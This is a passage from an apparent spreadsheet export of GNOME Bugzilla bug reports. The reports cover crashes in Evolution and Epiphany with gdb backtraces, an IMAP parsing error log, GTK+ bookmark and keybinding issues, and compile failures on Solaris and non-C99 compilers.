#14 0x4112115d in NSGetModule ()
   from /usr/lib/mozilla-1.4/components/libnecko.so
No symbol table info available.
#15 0x4112118e in NSGetModule ()
   from /usr/lib/mozilla-1.4/components/libnecko.so
No symbol table info available.
#16 0x41122463 in NSGetModule ()
   from /usr/lib/mozilla-1.4/components/libnecko.so
No symbol table info available.
#17 0x400e0011 in nsThread::Main(void*) ()
   from /usr/lib/mozilla-1.4/libxpcom.so
No symbol table info available.
#18 0x0811455d in _pt_root ()
No symbol table info available.
#19 0x40cd2332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 1128529200 (LWP 6417)):
#0  0xffffe002 in ?? ()
No symbol table info available.
Thread 1 (Thread 1089844832 (LWP 6412)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x40d0a9ab in g_main_context_poll (context=0x815b9f8 timeout=71 
    priority=2147483647 fds=0x824a218 n_fds=11) at gmain.c:2698
	poll_func = 0x8071eac 
#2  0x40d09d32 in g_main_context_iterate (context=0x815b9f8 block=1 
    dispatch=1 self=0x814d1a8) at gmain.c:2375
	max_priority = 2147483647
	timeout = 71
	some_ready = 0
	nfds = 11
	allocated_nfds = 11
	fds = (GPollFD *) 0x824a218
#3  0x40d0a59b in g_main_loop_run (loop=0x81470b8) at gmain.c:2600
	self = (GThread *) 0x814d1a8
#4  0x408b1218 in bonobo_main () at bonobo-main.c:294
	loop = (GMainLoop *) 0x81470b8
#5  0x0807d345 in main (argc=2 argv=0xbfffe294) at ephy-main.c:176
	icon_theme = (GnomeIconTheme *) 0x8247d70
	context = 0x8150af0
	context_as_value = {g_type = 0 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long =
0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0}}}
	program = (GnomeProgram *) 0x814ddc8
	file = 0x8272b58 gtk-window-key-hash
#6  0x420156a4 in __libc_start_main () from /lib/tls/libc.so.6
No symbol table info available.
#0  0xffffe002 in ?? ()
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-09-22 14:35 -------
Reassigning to the default owner of the component mpeseng@tin.it.
</t>
  </si>
  <si>
    <t>GTK+-320720</t>
  </si>
  <si>
    <t>reordring places bookmarks causes custom bookmark name to be lost</t>
  </si>
  <si>
    <t>Version details: 2.12.0 build from nrpms.net 9/6/2005
Distribution/Version: Fedora Core 4
1.  Create a couple bookmarks via file chooser (I used GIMP's Open... dialog
window).
2.  Right-click and rename one or more of the bookmarks.
3.  Drag a renamed bookmark to another position to reorder the bookmark list.
4.  Custom name for the bookmark will be lost and bookmark will be restored to
original name.</t>
  </si>
  <si>
    <t>phog614</t>
  </si>
  <si>
    <t>GEDIT-PLUGINS-99660</t>
  </si>
  <si>
    <t>Please replace file name with %s</t>
  </si>
  <si>
    <t>#: plugins/spell/gedit-spell-language-dialog.c:229
msgid Could not find the required widgets inside languages-dialog.glade2.\n
Please replace file names with %s. Then all translations won't have to be
updated if the path or file name changes even the slightest.</t>
  </si>
  <si>
    <t>EVOLUTION-268869</t>
  </si>
  <si>
    <t>IMAP4 rev1 error on selecting a mail folder</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what 
you are doing. 
Description of Problem: 
Steps to reproduce the problem: 
1.Setup a IMAP4 rev1 account and select a folder 
2. Error dialog appears saying error while opening folder blah blah  
reason is unexpected token form server foo 
3.  
Actual Results: 
Expected Results: 
Be able to see my mails. I can see that folder contents from imap account  
How often does this happen?  
Always and for all folders  
Additional Information: 
debug output after removing server and credential details  
token: * 
token: OK 
token: GroupWise 
sending: A00049 CAPABILITY 
token: * 
token: CAPABILITY 
token: IMAP4rev1 
token: STARTTLS 
token: AUTH=XGWTRUSTEDAPP 
token: XGWEXTENSIONS 
token: \n 
token: A00049 
got A00049 response 
token: OK 
token: CAPABILITY 
sending: A00050 LOGIN xxxxxxx xxxxxxxxx 
token: A00050 
got A00050 response 
token: OK 
token: LOGIN 
sending: A00051 LIST   
token: * 
token: LIST 
token: ( 
token: \Noselect 
token: ) 
token: / 
token:  
token: \n 
token: A00051 
got A00051 response 
token: OK 
token: LIST 
sending: A00052 LIST  evolution-users 
token: * 
token: LIST 
token: ( 
token: \Marked 
token: ) 
token: / 
token: evolution-users 
token: \n 
token: A00052 
got A00052 response 
token: OK 
token: LIST 
sending: A00053 SELECT evolution-users 
token: * 
token: 172 
token: EXISTS 
token: \n 
token: * 
token: 0 
token: RECENT 
token: \n 
token: * 
token: OK 
token: [ 
token: UNSEEN 
token: 73 
token: ] 
token: * 
token: OK 
token: [ 
token: UIDVALIDITY 
token: 1098260839 
token: ] 
token: * 
token: OK 
token: [ 
token: UIDNEXT 
token: 173 
token: ] 
token: * 
token: FLAGS 
token: ( 
token: \Answered 
token: \Flagged 
token: \Deleted 
token: \Draft 
token: \Seen 
token: ) 
token: \n 
token: * 
token: OK 
token: [ 
token: PERMANENTFLAGS 
token: ( 
token: \Answered 
token: \Flagged 
token: \Deleted 
token: \Draft 
token: \Seen 
token: \ 
Expected to find a ')' token terminating the flags list 
CamelException.set(0x43176e08 2 'Unexpected token in response from IMAP 
server fooooooooooo: \')</t>
  </si>
  <si>
    <t>snallagatla</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-113708</t>
  </si>
  <si>
    <t>Does not compile with non C99 compiler</t>
  </si>
  <si>
    <t>callbacks.c:422: warning: #warning FIXME
callbacks.c: In function `on_samba_use_toggled':
callbacks.c:604: parse error before `root'
callbacks.c:631: `root' undeclared (first use in this function)
callbacks.c:631: (Each undeclared identifier is reported only once
callbacks.c:631: for each function it appears in.)
make[4]: *** [callbacks.o] Error 1
make[4]: Leaving directory
`/temp/garnome/garnome-0.24.2/gnome/gnome-system-tools/work/main.d/gnome-system-tools-0.26.0/src/network'</t>
  </si>
  <si>
    <t>llanero</t>
  </si>
  <si>
    <t>EVINCE-399694</t>
  </si>
  <si>
    <t>Call to mutex_unlock in GDK_THREADS_LEAVE fails</t>
  </si>
  <si>
    <t>Please describe the problem:
When evince calls gtk_main its call to the macro GDK_THREADS_LEAVE calls mutex_unlock and this calls fails as the mutex has not been locked.
On Solaris we see this by setting the environment variable LIBTHREAD_ERRO_DETECTION=2 and runni ng evince which then crashes.
The cause of the problem seems to be that gdk_threads_init is called but gdk_threads_enter is not called before call to gtk_main
Steps to reproduce:
1. 
2. 
3. 
See summary
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-154492</t>
  </si>
  <si>
    <t>[obsolete] Keybinding</t>
  </si>
  <si>
    <t>[PATCH] eggcellrendererkeys handles Backspace differently in multi-layout keyboards</t>
  </si>
  <si>
    <t>In a system with a multi-layout keyboard (as used by anyone who
uses a non latin language otherwise you can just load two
layouts like this: 'setxkbmap usru -option shift_toggle'
and pressing two shift keys simultaneously will toggle between
US latin and russian cyrillic layouts)
launch gnome-keybinding-properties and select any binding
if you are on first keyboard layout pressing Backspace will
clean the binding now switch to second layout and try
again this time pressing Backspace will create a binding for
Backspace.
From doing a lookup witch xev it appears that the difference
is in the state value.
gnome-keybinding-properties should handle the Backspace key
the same way on first or other layouts otherwise it means
that the behaviour is different for people using latin
languages and people using non-latin languages.
Tested with xorg 6.7.0
First reported by Michal Bukovjan (with a dual uscz_qwerty
layout setup).</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-74476</t>
  </si>
  <si>
    <t>Other Preferences</t>
  </si>
  <si>
    <t>ui-properties: BOTH_HORIZ for GtkToolbar</t>
  </si>
  <si>
    <t xml:space="preserve">Package: control-center
Severity: enhancement
Version: 2.0
Synopsis: for ui default behavior: why is not there an option for toolbar type about text and icon
Bugzilla-Product: control-center
Bugzilla-Component: other capplets
Description:
in glade2 I've seen an option for gnome toolbar about text and icon.
text / icon / text and icon (vertical) / text and icon (horizontal)
but now there's only fore three menuitems in gnome2-ui-properties
dialog.
and 4th one is worth of default behaviour.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-03-12 23:44 -------
Reassigning to the default owner of the component tvgm@ximian.com.
</t>
  </si>
  <si>
    <t>keizie</t>
  </si>
  <si>
    <t>GNOME-DB-13086</t>
  </si>
  <si>
    <t>GNOME-DB</t>
  </si>
  <si>
    <t>gda-fe uses setenv which is not supported on all systems - it should use putenv</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnome-db
Severity: grave
Version:  0.0.95
Synopsis: gda-fe uses setenv which is not supported on all systems - it should use putenv
Class:    sw-bug
System: SunOS 5.6 sun4m sparc
C compiler: 2.95.2
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.1
gnome-libs: gnome-libs 1.2.1
libxml: 1.8.7
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.0
Description:
Compilation on Solaris 2.6 fails because a call is made to setenv:
Undefined			first referenced
 symbol  			    in file
setenv                              gda-fe-config.o
ld: fatal: Symbol referencing errors. No output written to .libs/gda-fe
collect2: ld returned 1 exit status
make[2]: *** [gda-fe] Error 1
setenv is not supported on many systems - putenv should be used instead
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-28 12:06 -------
This bug was previously known as bug 13086 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=13086
Originally filed under the gnome-db product and general component.
Unknown version unspecified in product gnome-db. Setting version to 0.2.2.
The original reporter (plb@clanger9.demon.co.uk) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-db-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>gnome-db-maint</t>
  </si>
  <si>
    <t>plb</t>
  </si>
  <si>
    <t>GTK+-129621</t>
  </si>
  <si>
    <t>Use resize cursors for resize grips</t>
  </si>
  <si>
    <t>This patch makes the cursor become a resize arrow when it is hovering over
a resize grip.</t>
  </si>
  <si>
    <t>ANJUTA-520766</t>
  </si>
  <si>
    <t>plugins: language-support-c-cpp-java</t>
  </si>
  <si>
    <t>Brace autocompletion</t>
  </si>
  <si>
    <t>I'll add the patch in the next message. I know it needs more work.</t>
  </si>
  <si>
    <t>EVOLUTION-214616</t>
  </si>
  <si>
    <t>mail crash!</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.16.100
Synopsis: mail crash!
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Just clicked on my mail folder...
Debugging Information:
[New Thread 1024 (LWP 2431)]
[New Thread 2049 (LWP 2445)]
[New Thread 1026 (LWP 2446)]
[New Thread 4099 (LWP 2449)]
[New Thread 3076 (LWP 2448)]
0x40b2dce9 in __wait4 () from /lib/libc.so.6
#0  0x40b2dce9 in __wait4 () from /lib/libc.so.6
#1  0x40baaf98 in __DTOR_END__ () from /lib/libc.so.6
#2  0x406d190e in waitpid (pid=2455 stat_loc=0xbfffe91c options=0)
    at wrapsyscall.c:172
#3  0x403072a6 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x809c82e in segv_redirect (sig=11) at main.c:69
#5  0x406cf4f7 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 
      edi = 136019344 esi = 136019344 ebp = 3221220584 esp = 3221220584 
      ebx = 1084521740 edx = 0 ecx = 0 eax = 0 trapno = 14 err = 4 
      eip = 1084401182 cs = 35 __csh = 0 eflags = 66118 
      esp_at_signal = 3221220584 ss = 43 __ssh = 0 fpstate = 0xbfffea68 
      oldmask = 2147483648 cr2 = 4}) at signals.c:97
#6  
#7  html_stack_is_empty (stack=0x0) at htmlstack.c:97
#8  0x40a0ec86 in current_font_style (e=0x81b7d90) at htmlengine.c:208
#9  0x40a0f4cd in insert_text (e=0x81b7d90 clue=0x81d8e28 text=0x81d903b  )
    at htmlengine.c:540
#10 0x40a0f981 in parse_body (e=0x81b7d90 clue=0x81d8e28 end=0x40a47328 
    toplevel=1) at htmlengine.c:766
#11 0x40a1676f in html_engine_timer_event (e=0x81b7d90) at htmlengine.c:3801
#12 0x40a16895 in html_engine_stream_end (stream=0x80f5de0 
    status=GTK_HTML_STREAM_OK data=0x81b7d90) at htmlengine.c:3859
#13 0x409f05f1 in gtk_html_stream_close (stream=0x80f5de0 
    status=GTK_HTML_STREAM_OK) at gtkhtml-stream.c:130
#14 0x409f4403 in gtk_html_end (html=0x81bae38 handle=0x80f5de0 
    status=GTK_HTML_STREAM_OK) at gtkhtml.c:2275
#15 0x808812c in mail_display_redisplay (md=0x81b27f8 unscroll=0)
    at mail-display.c:1394
#16 0x80b9b12 in option_changed (esb=0x81b77b8 data=0x0) at e-filter-bar.c:265
#17 0x404afb9f in gtk_marshal_NONE__NONE (object=0x81b77b8 
    func=0x80b9828  func_data=0x0 args=0xbfffef70)
    at gtkmarshal.c:312
#18 0x404df272 in gtk_handlers_run (handlers=0x80f9940 signal=0xbfffef10 
    object=0x81b77b8 params=0xbfffef70 after=0) at gtksignal.c:1917
#19 0x404de6d3 in gtk_signal_real_emit (object=0x81b77b8 signal_id=183 
    params=0xbfffef70) at gtksignal.c:1477
#20 0x404dc748 in gtk_signal_emit (object=0x81b77b8 signal_id=183)
    at gtksignal.c:552
#21 0x80bb03c in emit_query_changed (esb=0x81b77b8) at e-search-bar.c:76
#22 0x80bc6c3 in e_search_bar_set_option (search_bar=0x81b77b8 
    option_items=0xbffff290) at e-search-bar.c:706
#23 0x80bc47b in e_search_bar_construct (search_bar=0x81b77b8 
    menu_items=0xbffff290 option_items=0xbffff290) at e-search-bar.c:658
#24 0x80ba526 in e_filter_bar_new (context=0x814fc78 
    systemrules=0x8149f28 /usr/share/evolution/vfoldertypes.xml 
    userrules=0x8151988 /home/nico/evolution/searches.xml 
    config=0x80724f0  data=0x81a1dd0)
    at e-filter-bar.c:615
#25 0x807357c in folder_browser_gui_init (fb=0x81a1dd0)
    at folder-browser.c:1826
#26 0x8073e1c in folder_browser_new (shell=0x812a670 
    uri=0x8187864 imap://nico@intern.link-m.de/INBOX)
    at folder-browser.c:2055
#27 0x8074217 in folder_browser_factory_new_control (
    uri=0x8187864 imap://nico@intern.link-m.de/INBOX shell=0x812a670)
    at folder-browser-factory.c:174
#28 0x806cf7e in create_view (shell_component=0x8128e28 
    physical_uri=0x8187864 imap://nico@intern.link-m.de/INBOX 
    folder_type=0x818788c mail control_return=0xbffff398 closure=0x0)
    at component-factory.c:175
#29 0x4080acd8 in impl_createView (servant=0x8128e84 
    physical_uri=0x8187864 imap://nico@intern.link-m.de/INBOX 
    type=0x818788c mail ev=0xbffff410) at evolution-shell-component.c:480
#30 0x407f3d70 in _ORBIT_skel_GNOME_Evolution_ShellComponent_createView (
    _ORBIT_servant=0x8128e84 _ORBIT_recv_buffer=0x8127e60 ev=0xbffff410 
    _impl_createView=0x4080ac8c ) at Evolution-skels.c:1487
#31 0x409401b2 in ORBit_POA_handle_request (recv_buffer=0x8127e60 
    poa=0x8101570) at orbit_poa.c:507
#32 0x40943203 in ORBit_handle_incoming_request (recv_buffer=0x8127e60)
    at server.c:90
#33 0x409434fb in ORBit_handle_incoming_message (recv_buffer=0x8127e60)
    at server.c:160
#34 0x4095e76a in giop_recv_reply_buffer_use_multiple_2 (
    request_cnx=0x812aa00 request_ids=0xbffff518 block_for_reply=1)
    at giop-msg-buffer.c:1026
#35 0x4095e81f in giop_recv_reply_buffer_use_2 (request_cnx=0x812aa00 
    request_id=3221222800 block_for_reply=1) at giop-msg-buffer.c:1062
#36 0x408037c6 in GNOME_Evolution_StorageListener_notifyFolderCreated (
    _obj=0x81487f8 path=0x818b7e8 /INBOX folder=0x818770c ev=0xbffff5e0)
    at Evolution-stubs.c:8155
#37 0x4080f01b in evolution_storage_new_folder (evolution_storage=0x8147ab8 
    path=0x818b7e8 /INBOX display_name=0x8198b40 INBOX 
    type=0x80d8f6f mail 
    physical_uri=0x8198b50 imap://nico@intern.link-m.de/INBOX 
    description=0x8198b40 INBOX unread_count=1) at evolution-storage.c:859
#38 0x80897fc in real_flush_updates (o=0x0 event_data=0x0 data=0x0)
    at mail-folder-cache.c:193
#39 0x80924db in do_async_event (mm=0x818b948) at mail-mt.c:593
#40 0x8092548 in idle_async_event (mm=0x818b948) at mail-mt.c:604
#41 0x40598ff0 in g_idle_dispatch (source_data=0x8092538 
    dispatch_time=0xbffff750 user_data=0x818b948) at gmain.c:1367
#42 0x40598055 in g_main_dispatch (dispatch_time=0xbffff750) at gmain.c:656
#43 0x40598659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#44 0x405987e8 in g_main_run (loop=0x8101670) at gmain.c:935
#45 0x404ae3af in gtk_main () at gtkmain.c:524
#46 0x408d343b in bonobo_main () at bonobo-main.c:283
#47 0x809c9e9 in main (argc=3 argv=0xbffff974) at main.c:145
#48 0x40a96386 in __libc_start_main (main=0x809c858  argc=3 
    ubp_av=0xbffff974 init=0x8065cf0  fini=0x80d25cc  
    rtld_fini=0x4000d318  stack_end=0xbffff96c)
    at ../sysdeps/generic/libc-start.c:129
Thread 5 (Thread 3076 (LWP 2448)):
#0  0x40aa89b2 in __sigsuspend (set=0xbf3ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406ced91 in __pthread_wait_for_restart_signal (self=0xbf3ffc00)
    at pthread.c:969
#2  0x406caf14 in pthread_cond_wait (cond=0x8128a88 mutex=0x8128a68)
    at restart.h:34
#3  0x400816fc in e_msgport_wait (mp=0x8128a40) at e-msgport.c:198
#4  0x40081d3e in thread_dispatch (din=0x81289f0) at e-msgport.c:517
#5  0x406cbfb7 in pthread_start_thread (arg=0xbf3ffc00) at manager.c:284
Thread 4 (Thread 4099 (LWP 2449)):
#0  0x40aa89b2 in __sigsuspend (set=0xbf5ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406ced91 in __pthread_wait_for_restart_signal (self=0xbf5ffc00)
    at pthread.c:969
#2  0x406caf14 in pthread_cond_wait (cond=0x8128b30 mutex=0x8128b10)
    at restart.h:34
#3  0x400816fc in e_msgport_wait (mp=0x8128ae8) at e-msgport.c:198
#4  0x40081d3e in thread_dispatch (din=0x8128a98) at e-msgport.c:517
#5  0x406cbfb7 in pthread_start_thread (arg=0xbf5ffc00) at manager.c:284
Thread 3 (Thread 1026 (LWP 2446)):
#0  0x40aa89b2 in __sigsuspend (set=0xbf7ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406ced91 in __pthread_wait_for_restart_signal (self=0xbf7ffc00)
    at pthread.c:969
#2  0x406caf14 in pthread_cond_wait (cond=0x81289e0 mutex=0x81289c0)
    at restart.h:34
#3  0x400816fc in e_msgport_wait (mp=0x8128998) at e-msgport.c:198
#4  0x40081d3e in thread_dispatch (din=0x8128948) at e-msgport.c:517
#5  0x406cbfb7 in pthread_start_thread (arg=0xbf7ffc00) at manager.c:284
Thread 2 (Thread 2049 (LWP 2445)):
#0  0x40b58c94 in __poll (fds=0x8142204 nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x406cbd3e in __pthread_manager (arg=0x18) at manager.c:140
Thread 1 (Thread 1024 (LWP 2431)):
#0  0x40b2dce9 in __wait4 () from /lib/libc.so.6
#1  0x40baaf98 in __DTOR_END__ () from /lib/libc.so.6
#2  0x406d190e in waitpid (pid=2455 stat_loc=0xbfffe91c options=0)
    at wrapsyscall.c:172
#3  0x403072a6 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x809c82e in segv_redirect (sig=11) at main.c:69
#5  0x406cf4f7 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 
      edi = 136019344 esi = 136019344 ebp = 3221220584 esp = 3221220584 
      ebx = 1084521740 edx = 0 ecx = 0 eax = 0 trapno = 14 err = 4 
      eip = 1084401182 cs = 35 __csh = 0 eflags = 66118 
      esp_at_signal = 3221220584 ss = 43 __ssh = 0 fpstate = 0xbfffea68 
      oldmask = 2147483648 cr2 = 4}) at signals.c:97
#6  
#7  html_stack_is_empty (stack=0x0) at htmlstack.c:97
#8  0x40a0ec86 in current_font_style (e=0x81b7d90) at htmlengine.c:208
#9  0x40a0f4cd in insert_text (e=0x81b7d90 clue=0x81d8e28 text=0x81d903b  )
    at htmlengine.c:540
#10 0x40a0f981 in parse_body (e=0x81b7d90 clue=0x81d8e28 end=0x40a47328 
    toplevel=1) at htmlengine.c:766
#11 0x40a1676f in html_engine_timer_event (e=0x81b7d90) at htmlengine.c:3801
#12 0x40a16895 in html_engine_stream_end (stream=0x80f5de0 
    status=GTK_HTML_STREAM_OK data=0x81b7d90) at htmlengine.c:3859
#13 0x409f05f1 in gtk_html_stream_close (stream=0x80f5de0 
    status=GTK_HTML_STREAM_OK) at gtkhtml-stream.c:130
#14 0x409f4403 in gtk_html_end (html=0x81bae38 handle=0x80f5de0 
    status=GTK_HTML_STREAM_OK) at gtkhtml.c:2275
#15 0x808812c in mail_display_redisplay (md=0x81b27f8 unscroll=0)
    at mail-display.c:1394
#16 0x80b9b12 in option_changed (esb=0x81b77b8 data=0x0) at e-filter-bar.c:265
#17 0x404afb9f in gtk_marshal_NONE__NONE (object=0x81b77b8 
    func=0x80b9828  func_data=0x0 args=0xbfffef70)
    at gtkmarshal.c:312
#18 0x404df272 in gtk_handlers_run (handlers=0x80f9940 signal=0xbfffef10 
    object=0x81b77b8 params=0xbfffef70 after=0) at gtksignal.c:1917
#19 0x404de6d3 in gtk_signal_real_emit (object=0x81b77b8 signal_id=183 
    params=0xbfffef70) at gtksignal.c:1477
#20 0x404dc748 in gtk_signal_emit (object=0x81b77b8 signal_id=183)
    at gtksignal.c:552
#21 0x80bb03c in emit_query_changed (esb=0x81b77b8) at e-search-bar.c:76
#22 0x80bc6c3 in e_search_bar_set_option (search_bar=0x81b77b8 
    option_items=0xbffff290) at e-search-bar.c:706
#23 0x80bc47b in e_search_bar_construct (search_bar=0x81b77b8 
    menu_items=0xbffff290 option_items=0xbffff290) at e-search-bar.c:658
#24 0x80ba526 in e_filter_bar_new (context=0x814fc78 
    systemrules=0x8149f28 /usr/share/evolution/vfoldertypes.xml 
    userrules=0x8151988 /home/nico/evolution/searches.xml 
    config=0x80724f0  data=0x81a1dd0)
    at e-filter-bar.c:615
#25 0x807357c in folder_browser_gui_init (fb=0x81a1dd0)
    at folder-browser.c:1826
#26 0x8073e1c in folder_browser_new (shell=0x812a670 
    uri=0x8187864 imap://nico@intern.link-m.de/INBOX)
    at folder-browser.c:2055
#27 0x8074217 in folder_browser_factory_new_control (
    uri=0x8187864 imap://nico@intern.link-m.de/INBOX shell=0x812a670)
    at folder-browser-factory.c:174
#28 0x806cf7e in create_view (shell_component=0x8128e28 
    physical_uri=0x8187864 imap://nico@intern.link-m.de/INBOX 
    folder_type=0x818788c mail control_return=0xbffff398 closure=0x0)
    at component-factory.c:175
#29 0x4080acd8 in impl_createView (servant=0x8128e84 
    physical_uri=0x8187864 imap://nico@intern.link-m.de/INBOX 
    type=0x818788c mail ev=0xbffff410) at evolution-shell-component.c:480
#30 0x407f3d70 in _ORBIT_skel_GNOME_Evolution_ShellComponent_createView (
    _ORBIT_servant=0x8128e84 _ORBIT_recv_buffer=0x8127e60 ev=0xbffff410 
    _impl_createView=0x4080ac8c ) at Evolution-skels.c:1487
#31 0x409401b2 in ORBit_POA_handle_request (recv_buffer=0x8127e60 
    poa=0x8101570) at orbit_poa.c:507
#32 0x40943203 in ORBit_handle_incoming_request (recv_buffer=0x8127e60)
    at server.c:90
#33 0x409434fb in ORBit_handle_incoming_message (recv_buffer=0x8127e60)
    at server.c:160
#34 0x4095e76a in giop_recv_reply_buffer_use_multiple_2 (
    request_cnx=0x812aa00 request_ids=0xbffff518 block_for_reply=1)
    at giop-msg-buffer.c:1026
#35 0x4095e81f in giop_recv_reply_buffer_use_2 (request_cnx=0x812aa00 
    request_id=3221222800 block_for_reply=1) at giop-msg-buffer.c:1062
#36 0x408037c6 in GNOME_Evolution_StorageListener_notifyFolderCreated (
    _obj=0x81487f8 path=0x818b7e8 /INBOX folder=0x818770c ev=0xbffff5e0)
    at Evolution-stubs.c:8155
#37 0x4080f01b in evolution_storage_new_folder (evolution_storage=0x8147ab8 
    path=0x818b7e8 /INBOX display_name=0x8198b40 INBOX 
    type=0x80d8f6f mail 
    physical_uri=0x8198b50 imap://nico@intern.link-m.de/INBOX 
    description=0x8198b40 INBOX unread_count=1) at evolution-storage.c:859
#38 0x80897fc in real_flush_updates (o=0x0 event_data=0x0 data=0x0)
    at mail-folder-cache.c:193
#39 0x80924db in do_async_event (mm=0x818b948) at mail-mt.c:593
#40 0x8092548 in idle_async_event (mm=0x818b948) at mail-mt.c:604
#41 0x40598ff0 in g_idle_dispatch (source_data=0x8092538 
    dispatch_time=0xbffff750 user_data=0x818b948) at gmain.c:1367
#42 0x40598055 in g_main_dispatch (dispatch_time=0xbffff750) at gmain.c:656
#43 0x40598659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#44 0x405987e8 in g_main_run (loop=0x8101670) at gmain.c:935
#45 0x404ae3af in gtk_main () at gtkmain.c:524
#46 0x408d343b in bonobo_main () at bonobo-main.c:283
#47 0x809c9e9 in main (argc=3 argv=0xbffff974) at main.c:145
#48 0x40a96386 in __libc_start_main (main=0x809c858  argc=3 
    ubp_av=0xbffff974 init=0x8065cf0  fini=0x80d25cc  
    rtld_fini=0x4000d318  stack_end=0xbffff96c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40b2dce9 in __wait4 () from /lib/libc.so.6
#0  0x40b2dce9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40baaf98 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x406d190e in waitpid (pid=2455 stat_loc=0xbfffe91c options=0)
    at wrapsyscall.c:172
stat_loc = (int *) 0xbfffe91c
options = 0
result = 0
oldtype = 0
#3  0x403072a6 in gnome_segv_handle (signum=11) at gnome-init.c:659
estatus = 1078808417
in_segv = 1
pid = 0
#4  0x809c82e in segv_redirect (sig=11) at main.c:69
sig = 11
#5  0x406cf4f7 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 
      edi = 136019344 esi = 136019344 ebp = 3221220584 esp = 3221220584 
      ebx = 1084521740 edx = 0 ecx = 0 eax = 0 trapno = 14 err = 4 
      eip = 1084401182 cs = 35 __csh = 0 eflags = 66118 
      esp_at_signal = 3221220584 ss = 43 __ssh = 0 fpstate = 0xbfffea68 
      oldmask = 2147483648 cr2 = 4}) at signals.c:97
self = 0x406d8460
in_sighandler = 0x0
self = 0x406d8460
in_sighandler = 0x0
#6  
No locals.
#7  html_stack_is_empty (stack=0x0) at htmlstack.c:97
stack = (HTMLStack *) 0x809c80c
Unknown reporter: nkaiser@hotmail.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>nkaiser</t>
  </si>
  <si>
    <t>EVOLUTION-201848</t>
  </si>
  <si>
    <t>gpg signing a plain text message with attachments will end up empty/badly signed</t>
  </si>
  <si>
    <t>If you compose a message attach some stuff and GPG sign it will be sent
without the attachments and the signature is bad (probably created a digest with
the attachments). I am using e 0.9 (cvs.2001.03.14.20.52) from the RC snapshots.</t>
  </si>
  <si>
    <t>VALENCIA-712103</t>
  </si>
  <si>
    <t>VALENCIA</t>
  </si>
  <si>
    <t>parse class A.B</t>
  </si>
  <si>
    <t xml:space="preserve">
---- Reported by adam@yorba.org 2009-04-09 16:13:00 -0700 ----
Original Redmine bug id: 131
Original URL: http://redmine.yorba.org/issues/131
Searchable id: yorba-bug-131
Original author: Adam Dingle
Original description:
parse Ã¢â‚¬Å“class A.BÃ¢â‚¬Â
---- Additional Comments From valencia-maint@gnome.bugs 2013-04-30 18:35:00 -0700 ----
### History
####
#1
Updated by Adam Dingle over 4 years ago
  * **Status** changed from _Open_ to _5_
  * **Resolution** set to _fixed_
  * **% Done** set to _100_
####
#2
Updated by Charles Lindsay 6 months ago
  * **Status** changed from _5_ to _Fixed_
--- Bug imported by chaz@yorba.org 2013-11-12 00:16 UTC  ---
This bug was previously known as _bug_ 131 at http://redmine.yorba.org/show_bug.cgi?id=131
Unknown Component valencia
   Using default product and component set in Parameters 
Unknown version  in product valencia. 
   Setting version to !unspecified.
Unknown milestone unknown in product valencia. 
   Setting to default milestone for this product ---.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>valencia-maint</t>
  </si>
  <si>
    <t>GSTREAMER-159566</t>
  </si>
  <si>
    <t>[PATCH] Race conditions in deep_notify</t>
  </si>
  <si>
    <t>When running two threads that signal property changes some of the deep_notify
messages get mangled or just disappear. A test app will be submitted to show the
problem.</t>
  </si>
  <si>
    <t>RHYTHMBOX-320840</t>
  </si>
  <si>
    <t>Podcast Delete Dialog is Confusing</t>
  </si>
  <si>
    <t>I am attaching a proposed patch.
2005-11-06  Dennis Cranston  
	* sources/rb-podcast-source.c: (impl_delete): Make the podcast
	delete dialog less confusing.  Use HIG recommended button order.</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-522277</t>
  </si>
  <si>
    <t>crash in Evolution: sending receiving dele...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
sending receiving deleting email
Distribution: Gentoo Base System release 1.12.11.1
Gnome Release: 2.20.3 2008-01-17 (Gentoo)
